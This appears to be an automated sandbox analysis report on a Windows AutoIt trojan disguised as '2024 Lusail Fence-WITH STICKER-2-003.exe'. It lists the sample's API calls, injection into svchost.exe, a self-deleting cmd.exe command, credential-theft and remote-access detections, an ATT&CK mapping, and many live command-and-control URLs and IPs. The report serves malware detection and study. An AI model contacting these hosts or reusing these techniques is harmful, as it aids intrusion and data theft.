Code function: 0_2_00D84A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_00D84A35

Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe

Code function: 0_2_00DE4EC9 mouse_event,

0_2_00DE4EC9

Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe"			Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"			Jump to behavior

Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe

0_2_00DD81F7

Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe

Code function: 0_2_00DE4C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00DE4C03

Source: 2024 Lusail Fence-WITH STICKER-2-003.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: 2024 Lusail Fence-WITH STICKER-2-003.exe, explorer.exe, 00000003.00000002.3817490344.0000000009022000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272115538.0000000009013000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3812097614.0000000004880000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000000.1373449668.0000000001440000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.3809298739.0000000001441000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000003.00000000.1373449668.0000000001440000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.3809298739.0000000001441000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: ?Program Manager
Source: explorer.exe, 00000003.00000000.1372817528.0000000000C59000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3808320799.0000000000C59000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1Progman
Source: explorer.exe, 00000003.00000000.1373449668.0000000001440000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.3809298739.0000000001441000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe

Code function: 0_2_00DA886B cpuid

0_2_00DA886B

Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe

Code function: 0_2_00DB50D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00DB50D7

Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe

Code function: 0_2_00DC2230 GetUserNameW,

0_2_00DC2230

Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe

Code function: 0_2_00DB418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_00DB418A

Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe

Code function: 0_2_00D84AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00D84AFE

Stealing of Sensitive Information

Source: Yara match	File source: 0.2.2024 Lusail Fence-WITH STICKER-2-003.exe.18d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2024 Lusail Fence-WITH STICKER-2-003.exe.18d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.3808376595.0000000000640000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1418182361.0000000002FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3808465152.0000000000670000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1421599562.0000000003950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1366051855.00000000018D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1417629112.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3807906421.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Source: 2024 Lusail Fence-WITH STICKER-2-003.exe	Binary or memory string: WIN_81
Source: 2024 Lusail Fence-WITH STICKER-2-003.exe	Binary or memory string: WIN_XP
Source: 2024 Lusail Fence-WITH STICKER-2-003.exe	Binary or memory string: WIN_XPe
Source: 2024 Lusail Fence-WITH STICKER-2-003.exe	Binary or memory string: WIN_VISTA
Source: 2024 Lusail Fence-WITH STICKER-2-003.exe	Binary or memory string: WIN_7
Source: 2024 Lusail Fence-WITH STICKER-2-003.exe	Binary or memory string: WIN_8
Source: 2024 Lusail Fence-WITH STICKER-2-003.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Source: Yara match	File source: 0.2.2024 Lusail Fence-WITH STICKER-2-003.exe.18d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2024 Lusail Fence-WITH STICKER-2-003.exe.18d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.3808376595.0000000000640000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1418182361.0000000002FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3808465152.0000000000670000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1421599562.0000000003950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1366051855.00000000018D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1417629112.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3807906421.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Code function: 0_2_00DF6596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		0_2_00DF6596
Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Code function: 0_2_00DF6A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_00DF6A5A

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	2 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	21 Input Capture	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Shared Modules	2 Valid Accounts	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	21 Input Capture	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	2 Valid Accounts	3 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	3 Clipboard Data	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	21 Access Token Manipulation	1 DLL Side-Loading	NTDS	215 System Information Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	612 Process Injection	2 Valid Accounts	LSA Secrets	251 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Virtualization/Sandbox Evasion	Cached Domain Credentials	2 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	21 Access Token Manipulation	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	612 Process Injection	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
2024 Lusail Fence-WITH STICKER-2-003.exe	67%	ReversingLabs	Win32.Trojan.Autoit
2024 Lusail Fence-WITH STICKER-2-003.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://android.notify.windows.com/iOS	0%	URL Reputation	safe
http://schemas.micro	0%	URL Reputation	safe
http://www.texhio.online	0%	Avira URL Cloud	safe
http://www.texhio.online/ts59/www.femininequantumflowcoach.com	0%	Avira URL Cloud	safe
http://www.scarytube.world/ts59/?7n=5Kzuc08NHZ8t10osRye94ZQvODLPm8mJty646c/dpAg/zLZpW1bo0yg/pue6LIfdumZDuAZHWw==&2d8=3fe8kxnx8zVX-2L	0%	Avira URL Cloud	safe
https://api.msn.com:443/v1/news/Feed/Windows?t	0%	Avira URL Cloud	safe
http://www.cn-brand.com	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world	0%	Avira URL Cloud	safe
http://www.qjjkxi260l.top	0%	Avira URL Cloud	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	0%	Avira URL Cloud	safe
http://www.zangbreaker.com	0%	Avira URL Cloud	safe
https://api.msn.com:443/v1/news/Feed/Windows?	0%	Avira URL Cloud	safe
http://www.gb-electric-wheelchairs-8j.bondReferer:	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/weather/topstories/here-s-who-could-see-above-average-snowfall-this-winter	0%	Avira URL Cloud	safe
http://www.texhio.onlineReferer:	0%	Avira URL Cloud	safe
http://www.gb-electric-wheelchairs-8j.bond/ts59/www.lostaino.com	0%	Avira URL Cloud	safe
http://www.scarytube.world/ts59/www.robottts.com	0%	Avira URL Cloud	safe
https://excel.office.com	0%	Avira URL Cloud	safe
http://www.gb-electric-wheelchairs-8j.bond/ts59/	0%	Avira URL Cloud	safe
http://www.zangbreaker.com/ts59/?7n=/870L+f5uYuMeX+RQ7xUOiQTdWqbXz9Ki2XQMm/qjwY6yFcouCApqHiIgf95TupcdCgvNrXz6Q==&2d8=3fe8kxnx8zVX-2L	0%	Avira URL Cloud	safe
http://www.kgstrengthandperformance.com	0%	Avira URL Cloud	safe
http://www.scarytube.worldReferer:	0%	Avira URL Cloud	safe
https://api.msn.com/v1/news/Feed/Windows?activityId=DD4083B70FE54739AB05D6BBA3484042&timeOut=5000&oc	0%	Avira URL Cloud	safe
http://www.scarytube.world/ts59/	0%	Avira URL Cloud	safe
http://www.lostaino.com/ts59/	0%	Avira URL Cloud	safe
http://www.asmauardotreschicshoes.com/ts59/www.texhio.online	0%	Avira URL Cloud	safe
http://www.robottts.com/ts59/	0%	Avira URL Cloud	safe
http://www.ssweatstudio.com	0%	Avira URL Cloud	safe
https://wns.windows.com/	0%	Avira URL Cloud	safe
http://www.wizardatm.com	0%	Avira URL Cloud	safe
http://www.autoitscript.com/autoit3/J	0%	Avira URL Cloud	safe
http://www.robottts.comReferer:	0%	Avira URL Cloud	safe
http://www.gb-electric-wheelchairs-8j.bond/ts59/?7n=mB8uG6w8zpafFuNLwvQmLBNoWWmhhT+Pa5pMyx7Kkg5PpWq+xUX3NBFKVo2JmSZYGQcG7mEBYw==&2d8=3fe8kxnx8zVX-2L	0%	Avira URL Cloud	safe
https://word.office.com	0%	Avira URL Cloud	safe
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	0%	Avira URL Cloud	safe
http://www.asmauardotreschicshoes.com/ts59/?7n=mlngg5Tq8mAbovLDpSTQPdURm3XRXD2izxcBP0x82yVhlreLb+x9gDDmRHWXZVcg0gqB6qNybQ==&2d8=3fe8kxnx8zVX-2L	0%	Avira URL Cloud	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark	0%	Avira URL Cloud	safe
http://www.asmauardotreschicshoes.com	0%	Avira URL Cloud	safe
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	0%	Avira URL Cloud	safe
https://outlook.com	0%	Avira URL Cloud	safe
http://www.modleavedepts.online/ts59/www.kgstrengthandperformance.com	0%	Avira URL Cloud	safe
http://www.modleavedepts.onlineReferer:	0%	Avira URL Cloud	safe
https://www.cloudflare.com/5xx-error-landing	0%	Avira URL Cloud	safe
http://www.babyscan.xyz	0%	Avira URL Cloud	safe
http://www.asmauardotreschicshoes.com/ts59/	0%	Avira URL Cloud	safe
http://www.lostaino.com/ts59/?7n=CMI3XAkyIIc+lbzQFM0yBiMxIQj45W/6BGDFfPoe8SD5h+4DN1QfAHIl1f4AVZ60VX6NCS7/mA==&2d8=3fe8kxnx8zVX-2L	0%	Avira URL Cloud	safe
https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp	0%	Avira URL Cloud	safe
http://www.qjjkxi260l.topReferer:	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the	0%	Avira URL Cloud	safe
http://www.lostaino.com/ts59/www.modleavedepts.online	0%	Avira URL Cloud	safe
http://www.wizardatm.com/ts59/www.zangbreaker.com	0%	Avira URL Cloud	safe
http://www.femininequantumflowcoach.com	0%	Avira URL Cloud	safe
http://www.robottts.com/ts59/?7n=cK9IFJet6pmJE86ae8KOHfirNs8pECX6NYxzkQ3MXT6vCvPIzrd8O4FQURVhV/WvD5THDom2OA==&2d8=3fe8kxnx8zVX-2L	0%	Avira URL Cloud	safe
http://www.redseadivingadventure.com/ts59/	0%	Avira URL Cloud	safe
https://api.msn.com/v1/news/Feed/Windows?	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actua	0%	Avira URL Cloud	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT	0%	Avira URL Cloud	safe
https://www.pollensense.com/	0%	Avira URL Cloud	safe
http://www.wizardatm.comReferer:	0%	Avira URL Cloud	safe
http://www.lostaino.com	0%	Avira URL Cloud	safe
https://status.squarespace.com	0%	Avira URL Cloud	safe
http://www.femininequantumflowcoach.com/ts59/	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b	0%	Avira URL Cloud	safe
http://www.zangbreaker.com/ts59/www.babyscan.xyz	0%	Avira URL Cloud	safe
http://www.babyscan.xyz/ts59/www.scarytube.world	0%	Avira URL Cloud	safe
http://www.zangbreaker.com/ts59/	0%	Avira URL Cloud	safe
http://www.babyscan.xyz/ts59/?7n=Q0rerqlMM+Mzf1m4EVXcVVXnMVAfvTa9yYuOwxw9IZ3XTRGu1uzNDOvhppaUL+BqZnD0gHwuuw==&2d8=3fe8kxnx8zVX-2L	0%	Avira URL Cloud	safe
http://www.wizardatm.com/ts59/	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-	0%	Avira URL Cloud	safe
http://www.ssweatstudio.comReferer:	0%	Avira URL Cloud	safe
http://www.redseadivingadventure.com/ts59/www.ssweatstudio.com	0%	Avira URL Cloud	safe
http://www.cn-brand.com/ts59/www.asmauardotreschicshoes.com	0%	Avira URL Cloud	safe
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew	0%	Avira URL Cloud	safe
http://www.ssweatstudio.com/ts59/	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it	0%	Avira URL Cloud	safe
http://www.texhio.online/ts59/	0%	Avira URL Cloud	safe
http://www.modleavedepts.online/ts59/	0%	Avira URL Cloud	safe
http://www.cn-brand.comReferer:	0%	Avira URL Cloud	safe
http://www.kgstrengthandperformance.com/ts59/www.redseadivingadventure.com	0%	Avira URL Cloud	safe
http://www.robottts.com	0%	Avira URL Cloud	safe
http://www.zangbreaker.comReferer:	0%	Avira URL Cloud	safe
http://www.ssweatstudio.com/ts59/www.qjjkxi260l.top	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/music/news/6-rock-ballads-that-tug-at-the-heartstrings/ar-AA1hIdsm	0%	Avira URL Cloud	safe
http://www.babyscan.xyzReferer:	0%	Avira URL Cloud	safe
http://www.redseadivingadventure.com	0%	Avira URL Cloud	safe
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg	0%	Avira URL Cloud	safe
http://www.qjjkxi260l.top/ts59/	0%	Avira URL Cloud	safe
https://powerpoint.office.com	0%	Avira URL Cloud	safe
http://www.cn-brand.com/ts59/?7n=6XBHEvjpc5M3V6LIfIX8DkkGcsaew2r6P99WVPRIfudOyKrWJ/Ql+0StQIWY9mDv/yxfQ54Ieg==&2d8=3fe8kxnx8zVX-2L	0%	Avira URL Cloud	safe
http://www.robottts.com/ts59/www.gb-electric-wheelchairs-8j.bond	0%	Avira URL Cloud	safe
http://www.foreca.com	0%	Avira URL Cloud	safe
http://www.lostaino.comReferer:	0%	Avira URL Cloud	safe
www.gb-electric-wheelchairs-8j.bond/ts59/	0%	Avira URL Cloud	safe
http://www.kgstrengthandperformance.com/ts59/	0%	Avira URL Cloud	safe
http://www.redseadivingadventure.comReferer:	0%	Avira URL Cloud	safe
http://www.kgstrengthandperformance.comReferer:	0%	Avira URL Cloud	safe
http://www.gb-electric-wheelchairs-8j.bond	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.robottts.com	3.64.163.50	true	true	unknown
hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com	52.86.6.113	true	true	unknown
modleavedepts.online	104.194.9.178	true	true	unknown
femininequantumflowcoach.com	192.0.78.25	true	true	unknown
zangbreaker.com	3.33.130.190	true	true	unknown
www.gb-electric-wheelchairs-8j.bond	185.53.179.91	true	true	unknown
shops.myshopify.com	23.227.38.74	true	true	unknown
www.scarytube.world	13.248.169.48	true	true	unknown
ext-sq.squarespace.com	198.185.159.144	true	true	unknown
www.babyscan.xyz	3.64.163.50	true	true	unknown
www.femininequantumflowcoach.com	unknown	unknown	true	unknown
www.lostaino.com	unknown	unknown	true	unknown
www.modleavedepts.online	unknown	unknown	true	unknown
time.windows.com	unknown	unknown	true	unknown
www.zangbreaker.com	unknown	unknown	true	unknown
www.cn-brand.com	unknown	unknown	true	unknown
www.asmauardotreschicshoes.com	unknown	unknown	true	unknown
www.wizardatm.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.scarytube.world/ts59/?7n=5Kzuc08NHZ8t10osRye94ZQvODLPm8mJty646c/dpAg/zLZpW1bo0yg/pue6LIfdumZDuAZHWw==&2d8=3fe8kxnx8zVX-2L	true	Avira URL Cloud: safe	unknown
http://www.zangbreaker.com/ts59/?7n=/870L+f5uYuMeX+RQ7xUOiQTdWqbXz9Ki2XQMm/qjwY6yFcouCApqHiIgf95TupcdCgvNrXz6Q==&2d8=3fe8kxnx8zVX-2L	true	Avira URL Cloud: safe	unknown
http://www.gb-electric-wheelchairs-8j.bond/ts59/?7n=mB8uG6w8zpafFuNLwvQmLBNoWWmhhT+Pa5pMyx7Kkg5PpWq+xUX3NBFKVo2JmSZYGQcG7mEBYw==&2d8=3fe8kxnx8zVX-2L	true	Avira URL Cloud: safe	unknown
http://www.asmauardotreschicshoes.com/ts59/?7n=mlngg5Tq8mAbovLDpSTQPdURm3XRXD2izxcBP0x82yVhlreLb+x9gDDmRHWXZVcg0gqB6qNybQ==&2d8=3fe8kxnx8zVX-2L	true	Avira URL Cloud: safe	unknown
http://www.lostaino.com/ts59/?7n=CMI3XAkyIIc+lbzQFM0yBiMxIQj45W/6BGDFfPoe8SD5h+4DN1QfAHIl1f4AVZ60VX6NCS7/mA==&2d8=3fe8kxnx8zVX-2L	true	Avira URL Cloud: safe	unknown
http://www.robottts.com/ts59/?7n=cK9IFJet6pmJE86ae8KOHfirNs8pECX6NYxzkQ3MXT6vCvPIzrd8O4FQURVhV/WvD5THDom2OA==&2d8=3fe8kxnx8zVX-2L	true	Avira URL Cloud: safe	unknown
http://www.babyscan.xyz/ts59/?7n=Q0rerqlMM+Mzf1m4EVXcVVXnMVAfvTa9yYuOwxw9IZ3XTRGu1uzNDOvhppaUL+BqZnD0gHwuuw==&2d8=3fe8kxnx8zVX-2L	true	Avira URL Cloud: safe	unknown
http://www.cn-brand.com/ts59/?7n=6XBHEvjpc5M3V6LIfIX8DkkGcsaew2r6P99WVPRIfudOyKrWJ/Ql+0StQIWY9mDv/yxfQ54Ieg==&2d8=3fe8kxnx8zVX-2L	true	Avira URL Cloud: safe	unknown
www.gb-electric-wheelchairs-8j.bond/ts59/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.cn-brand.com	explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.texhio.online	explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.qjjkxi260l.top	explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.texhio.online/ts59/www.femininequantumflowcoach.com	explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.msn.com:443/v1/news/Feed/Windows?t	explorer.exe, 00000003.00000000.1375368578.0000000007276000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3812362279.0000000007276000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	explorer.exe, 00000003.00000002.3812362279.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375368578.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.zangbreaker.com	explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world	explorer.exe, 00000003.00000002.3812362279.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375368578.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.msn.com:443/v1/news/Feed/Windows?	explorer.exe, 00000003.00000002.3812362279.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375368578.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/weather/topstories/here-s-who-could-see-above-average-snowfall-this-winter	explorer.exe, 00000003.00000002.3812362279.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375368578.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.gb-electric-wheelchairs-8j.bondReferer:	explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://excel.office.com	explorer.exe, 00000003.00000000.1379885909.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3820341536.000000000C091000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-	explorer.exe, 00000003.00000002.3812362279.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375368578.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.gb-electric-wheelchairs-8j.bond/ts59/www.lostaino.com	explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.gb-electric-wheelchairs-8j.bond/ts59/	explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
